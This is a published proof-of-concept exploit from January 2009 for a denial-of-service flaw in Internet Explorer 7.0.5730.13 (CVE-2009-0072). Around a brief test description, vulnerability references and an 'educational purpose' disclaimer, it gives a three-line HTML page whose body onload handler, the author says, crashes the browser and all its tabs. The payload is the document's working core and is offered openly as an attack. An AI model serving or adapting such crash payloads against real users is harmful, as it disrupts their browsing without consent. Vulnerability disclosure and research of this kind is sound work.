Microsoft Internet Explorer 7.0.5730.13 Javascript screen[] denial of service exploit.
1788556f864da691e29d281e9f29a58d6ca6b77ac8046ec570596cb6fb81f22e
########################################################################################
#svchost.exe CPU usage boils up to almost 100 percent when we open the malicious
#webpage and IE7 (Version 7.0.5730.13) closes with all tabs.
#
#Tested On:
# Microsoft(R) Windows(R) Server 2003, Standard Edition with Service Pack 2
#
#With:
# IE Version 7.0.5730.13
#
# I didn't use Javascript anywhere in the HTML below. It might be the background
# processing of "onload" NULL pointer by IE which leads to the cra$$$hhhhh!!!
#
#Reference:
# http://xforce.iss.net/xforce/xfdb/47788
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
#
#########################################################################################
#########Thanx 2 str0ke, milw0rm, SkyLined and all Security folks !!!####################
#########################################################################################
<html>
<title>MS IE 'screen[""]' Remote Denial of Service Vulnerability</title>
<body onload=screen[""]>
</html>
########################################################################################
# This is strictly written for educational purpose. Use it at
# your own risk. Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://darshanams.blogspot.com
# <http://darshanams.blogspot.com/>
# Date: 09th Jan., 2009
#
########################################################################################